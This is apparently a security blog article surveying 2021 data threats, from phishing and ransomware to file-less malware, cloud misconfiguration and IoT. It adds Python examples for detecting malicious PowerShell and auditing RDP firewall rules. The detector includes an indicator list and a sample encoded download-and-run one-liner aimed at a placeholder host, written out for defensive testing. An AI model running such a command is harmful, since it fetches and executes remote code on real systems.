A lot has changed since the COVID-19 pandemic arrived on our shores, including the already complex and evolving world of data security. Many more employees are now working from home, and many will continue to do so, even after the pandemic eventually subsides.
Allowing employees to work from home can be beneficial for both parties; however, many companies were woefully unprepared for the security challenges that such a shift would bring.
According to Channel Futures, there’s been a 40% increase in the number of devices using an unsecured remote desktop protocol (RDP) connection, which makes it easier for cyber-criminals to brute-force their way into an employee’s device, and thus potentially gain access to valuable company data.
With or without a pandemic to contend with, it’s fair to say that the upsurge in data security threats would have continued to plague organizations across the globe.
And, to add insult to injury, we are still grappling with a serious shortage of cyber-security professionals. Let’s take a deeper dive into the main data security threats that we need to watch out for in 2021.
Pandemic-related phishing attacks
Cybercriminals will continue to look for ways to capitalize on the ongoing crisis. Over the past year, the coronavirus pandemic has been the theme of a plethora of phishing campaigns. Some of them involved emails pretending to be from a CEO, containing malicious attachments that masquerade as a guide on how to stay safe.
Others pretend to be from a government agency sending out economic stimulus payments, in an attempt to obtain the victim’s bank account details.
Double-extortion ransomware attacks
Double-extortion ransomware attacks are those in which the attacker steals sensitive information before deploying the ransomware program. Following a successful infection, the attacker threatens to leak the stolen data if the ransom is not paid. According to an article published in The National Law Review, Cybersecurity Ventures has predicted that a business will fall victim to a ransomware attack every 11 seconds in 2021 – down from every 14 seconds in 2019. They also predict that the total cost of ransomware will exceed $20 billion globally.
Misconfigured cloud-storage facilities
As more companies adopt cloud services, we will likely see an increase in the number of data breaches caused by misconfigured storage. Over the last few years, we’ve seen a large number of cases relating to “leaky” Amazon S3 buckets: misconfigured security settings allowed the buckets to become publicly accessible over the Internet. While AWS has assured us that S3 buckets are now private by default, the service is still criticized for making it too easy for the average user to misconfigure their accounts.
File-less malware attacks
File-less malware is malware that does not arrive as a file and typically does not create new files. Instead, it is designed to operate in memory, without ever touching the hard drive. The absence of a file-based payload makes file-less attacks harder to detect than traditional forms of malware.
File-less malware typically works by leveraging legitimate tools that are part of the victim’s operating system, such as Microsoft Windows PowerShell. PowerShell is often used by administrators for automation and configuration management. Using the command-line shell and its associated scripting language, the attacker can perform virtually any operation they want on the underlying operating system.
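Because file-less attacks leave nothing on disk, detection shifts to what PowerShell was asked to execute. PowerShell Script Block Logging (Event ID 4104) records the script text itself, and a payload passed via `-EncodedCommand` is just base64 of the UTF-16LE script, so it can be decoded before matching. The following is an added example, not code from the original article or from Microsoft, that scores constructed 4104-style events against a small indicator list; the indicator weights and the alert threshold are assumptions made for the example.

```python
import base64
import re
from typing import Dict, List

# Indicator patterns matched case-insensitively against the script block text.
# The weights are an assumption for this example, not a vendor's scoring.
INDICATORS: Dict[str, int] = {
    r"\bIEX\b|Invoke-Expression": 3,
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient": 3,
    r"FromBase64String": 2,
    r"-(?:w|WindowStyle)\s+Hidden": 2,
    r"-(?:nop|NoProfile)\b": 1,
    r"-(?:ep|ExecutionPolicy)\s+Bypass": 2,
    r"\[System\.Reflection\.Assembly\]::Load|Add-Type": 2,
}
ALERT_THRESHOLD = 4


def encode_ps(command: str) -> str:
    """Base64 of UTF-16LE: the encoding PowerShell expects for -EncodedCommand.
    Used here only to build a constructed sample event."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str) -> str:
    """If the text carries -EncodedCommand (or its short forms) followed by base64,
    append the decoded payload so indicators inside it become visible."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    if not m:
        return text
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text
    return text + "\n" + decoded


def score_script_block(text: str) -> int:
    """Sum the weights of every indicator present in the (decoded) script text."""
    expanded = decode_encoded_command(text)
    return sum(w for pat, w in INDICATORS.items() if re.search(pat, expanded, re.I))


def detect(events: List[Dict[str, str]]) -> List[str]:
    """Return the EventRecordIDs whose script block meets the alert threshold."""
    return [e["EventRecordID"] for e in events
            if score_script_block(e["ScriptBlockText"]) >= ALERT_THRESHOLD]


# Constructed sample events; the field names loosely follow Event ID 4104.
# Record 1002 is a textbook download-and-run one-liner wrapped in -enc,
# pointing at a non-routable example host.
SAMPLE_EVENTS = [
    {"EventRecordID": "1001",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"EventRecordID": "1002",
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')")},
    {"EventRecordID": "1003",
     "ScriptBlockText": "Import-Module ActiveDirectory; Get-ADUser -Filter * | Export-Csv users.csv"},
]
```

In production the same logic would run over 4104 events exported from the Windows event log or a SIEM; the point of decoding first is that the encoded form of record 1002 contains none of the indicator strings until it is turned back into UTF-16LE text.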
Business Process Compromise (BPC)
In some cases, cyber-criminals will seek to exploit vulnerabilities in business processes, as opposed to the applications that are used. A simple example of how an attacker might compromise a business process would be where they change the bank details on an automatic invoicing tool in an attempt to receive payments when future invoices are paid.
As you might expect, in order to compromise a business process, the attacker must acquire an in-depth knowledge of the processes that exist within the target organization’s IT environment, which requires research and patience.
While there are few statistics available that can help us understand the scale of BPC, we know that attackers have realized that highly targeted attacks often yield the greatest rewards.
Attacks on IoT systems and devices
According to a recent report by Nozomi Networks, the first half of 2020 saw an increase in attacks on Internet of Things (IoT) devices and networks. Most attacks came from IoT botnets, which are used to perform Distributed Denial-of-Service attacks. An increasing number of industries are deploying IoT devices and applications for a variety of reasons.
Some companies are using IoT devices to automate their security systems and to keep track of who is entering their premises. The United Parcel Service (UPS) has developed an On-Road Integrated Optimization and Navigation (ORION) system that identifies the shortest and most fuel-efficient routes. IoT devices have also been used to improve renewable energy technologies, such as wind turbines, to keep them running at peak efficiency and protect them from damage.
As organizations continue to find more innovative ways to use IoT devices to streamline their operations, cyber-criminals will be doing everything they can to exploit their vulnerabilities.
As always, the first line of defense against phishing attacks, including the distribution of ransomware, is to ensure that your employees have been sufficiently trained to identify potentially malicious email links and attachments.
To help prevent attacks that take advantage of Remote Desktop Protocol (RDP), only allow remote access from known IP addresses, ideally those of a known VPN server; this also keeps the RDP connection ports hidden from the public internet.
For the sake of obscurity, you can also serve RDP on a non-standard port number, which may help against simple, automated attack vectors but does not replace the controls above. Also, use multi-factor authentication (MFA) whenever possible. Always check the security settings on any cloud storage solutions you use, and use a Data Security Platform to help you keep track of who is accessing your sensitive data, when, and how.
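A quick way to verify the RDP advice above against an exported firewall rule set is to check that every allow rule for the RDP port has a remote scope inside the VPN address pool. The following is an added example, not code from the original article or from any firewall vendor: the rule format, the VPN pool `10.8.0.0/24`, and the sample rules are constructed for the example, and the port parameter lets the same audit cover a non-standard RDP port.

```python
import ipaddress
from dataclasses import dataclass
from typing import List

RDP_PORT = 3389

# Assumption for this example: remote desktop sessions must originate from the
# VPN concentrator's address pool. Any allow rule reaching wider is a finding.
VPN_POOL = ipaddress.ip_network("10.8.0.0/24")


@dataclass
class FirewallRule:
    name: str
    action: str        # "allow" or "block"
    local_port: int
    remote_scope: str  # CIDR or single address, or "any"


def rule_exposes_rdp(rule: FirewallRule, rdp_port: int = RDP_PORT) -> bool:
    """True if an allow rule lets the RDP port be reached from outside VPN_POOL."""
    if rule.action.lower() != "allow" or rule.local_port != rdp_port:
        return False
    if rule.remote_scope.lower() == "any":
        return True
    scope = ipaddress.ip_network(rule.remote_scope, strict=False)
    if scope.version != VPN_POOL.version:
        return True  # an IPv6 scope cannot lie inside an IPv4 pool
    return not scope.subnet_of(VPN_POOL)


def audit(rules: List[FirewallRule], rdp_port: int = RDP_PORT) -> List[str]:
    """Names of the rules that expose RDP beyond the VPN pool."""
    return [r.name for r in rules if rule_exposes_rdp(r, rdp_port)]


# Constructed sample rule set: one correct rule, two findings, one unrelated
# allow, and a default block that should not be reported.
SAMPLE_RULES = [
    FirewallRule("RDP from VPN", "allow", 3389, "10.8.0.0/24"),
    FirewallRule("RDP legacy any", "allow", 3389, "any"),
    FirewallRule("RDP from corp LAN", "allow", 3389, "192.168.10.0/24"),
    FirewallRule("HTTPS", "allow", 443, "any"),
    FirewallRule("Block RDP default", "block", 3389, "any"),
]
```

If RDP has been moved to a non-standard port, run `audit(rules, rdp_port=<that port>)`; the obscurity does nothing if a rule on the new port is still open to `any`. Note that the check deliberately treats a corporate LAN range as a finding, because the advice in the text is to accept remote desktop sessions only from the VPN.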
Securing IoT devices can be slightly more involved, largely because they are difficult to patch, and the absence of a user interface can make it difficult to instruct users on how to deploy updates. However, this problem can be mitigated by using an automated patch management solution from a trusted vendor. It is crucial that any default passwords for IoT devices are replaced with strong passwords, and Universal Plug and Play (UPnP) should be disabled on all IoT devices.
Additionally, IoT devices should not have access to sensitive data and should ideally be kept on a separate network that is isolated from your main network. Finally, whenever possible, disconnect your IoT devices from the internet.